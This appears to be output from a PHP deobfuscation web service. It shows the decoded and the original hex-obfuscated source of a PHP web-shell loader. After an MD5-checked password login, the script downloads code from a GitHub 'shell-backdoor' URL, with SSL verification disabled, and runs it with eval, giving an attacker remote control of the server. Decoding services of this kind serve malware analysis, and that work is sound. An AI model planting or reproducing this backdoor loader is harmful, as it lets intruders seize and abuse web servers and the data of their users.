Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto P0XJi; TwW54: if (isset($_POST["\x70\141\163\163\167\157\162\144"])) { $enter..
Decoded Output download
<?php
goto P0XJi; TwW54: if (isset($_POST["password"])) { $entered_password = $_POST["password"]; $hashed_password = "a4af9adc69910a86f816e656d8e8ad60"; if (md5($entered_password) === $hashed_password) { $_SESSION["logged_in"] = true; $_SESSION["coki"] = "seopecahterus"; } else { echo "Incorrect password. Please try again."; } } goto VD98L; NXIR9: function is_logged_in() { return isset($_SESSION["logged_in"]) && $_SESSION["logged_in"] === true; } goto TwW54; HHuvy: function geturlsinfo($url) { if (function_exists("curl_exec")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["coki"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["coki"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("file_get_contents")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto NXIR9; P0XJi: session_start(); goto HHuvy; VD98L: if (is_logged_in()) { $a = geturlsinfo("https://raw.githubusercontent.com/kelelawar-cyber-team/shell-backdoor/main/anon.txt"); eval("?>" . $a); } else { ?>
<!doctypehtml><html><head><title>F :V</title></head><body><form action=""method="POST"><label for="password">P:</label> <input type="password"id="password"name="password"> <input type="submit"value="syebell"></form></body></html><?php } goto fQOqe; fQOqe: ?>Did this file decode correctly?
Original Code
<?php
goto P0XJi; TwW54: if (isset($_POST["\x70\141\163\163\167\157\162\144"])) { $entered_password = $_POST["\x70\x61\x73\163\167\157\x72\x64"]; $hashed_password = "\141\64\141\146\x39\x61\x64\143\x36\71\x39\61\60\x61\70\66\146\70\61\66\x65\66\65\66\x64\x38\x65\x38\141\144\x36\60"; if (md5($entered_password) === $hashed_password) { $_SESSION["\x6c\157\x67\x67\x65\144\x5f\x69\x6e"] = true; $_SESSION["\x63\x6f\x6b\151"] = "\163\x65\x6f\160\x65\143\x61\x68\164\145\x72\165\163"; } else { echo "\111\x6e\143\157\162\x72\x65\x63\164\40\x70\141\x73\x73\167\x6f\x72\x64\56\x20\120\154\145\141\x73\x65\x20\164\162\x79\40\141\147\141\x69\x6e\x2e"; } } goto VD98L; NXIR9: function is_logged_in() { return isset($_SESSION["\154\157\x67\x67\145\144\x5f\x69\x6e"]) && $_SESSION["\154\x6f\147\x67\145\x64\137\x69\x6e"] === true; } goto TwW54; HHuvy: function geturlsinfo($url) { if (function_exists("\143\165\x72\154\137\145\170\145\143")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "\x4d\157\172\x69\x6c\x6c\x61\x2f\65\x2e\x30\40\50\x57\151\156\x64\x6f\x77\x73\40\116\124\x20\x36\x2e\x31\x3b\40\162\166\72\x33\62\56\60\51\x20\x47\x65\143\153\157\57\62\60\61\60\60\x31\60\x31\x20\x46\x69\x72\145\x66\157\170\x2f\63\x32\x2e\60"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION["\143\157\x6b\151"])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION["\x63\x6f\x6b\x69"]); } $url_get_contents_data = curl_exec($conn); curl_close($conn); } elseif (function_exists("\x66\151\154\x65\137\x67\145\164\137\143\157\156\x74\145\156\x74\163")) { $url_get_contents_data = file_get_contents($url); } elseif (function_exists("\146\157\x70\145\x6e") && function_exists("\163\x74\x72\x65\141\x6d\x5f\147\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\164\163")) { $handle = fopen($url, "\x72"); $url_get_contents_data = stream_get_contents($handle); fclose($handle); } else { $url_get_contents_data = false; } return $url_get_contents_data; } goto NXIR9; P0XJi: session_start(); goto HHuvy; VD98L: if (is_logged_in()) { $a = geturlsinfo("\x68\164\x74\x70\163\72\57\57\162\x61\167\x2e\x67\x69\x74\x68\165\x62\165\x73\x65\162\x63\157\x6e\x74\x65\x6e\164\x2e\143\x6f\155\57\153\145\x6c\145\154\141\x77\141\162\x2d\143\171\x62\145\162\x2d\164\145\x61\155\57\163\x68\145\154\x6c\55\x62\141\143\x6b\x64\x6f\x6f\x72\57\155\x61\151\156\57\141\x6e\157\156\x2e\164\x78\x74"); eval("\77\76" . $a); } else { ?>
<!doctypehtml><html><head><title>F :V</title></head><body><form action=""method="POST"><label for="password">P:</label> <input type="password"id="password"name="password"> <input type="submit"value="syebell"></form></body></html><?php } goto fQOqe; fQOqe: ?>Function Calls
| None |
Stats
| MD5 | 52a0078083f6cf24816db646159d1215 |
| Eval Count | 0 |
| Decode Time | 50 ms |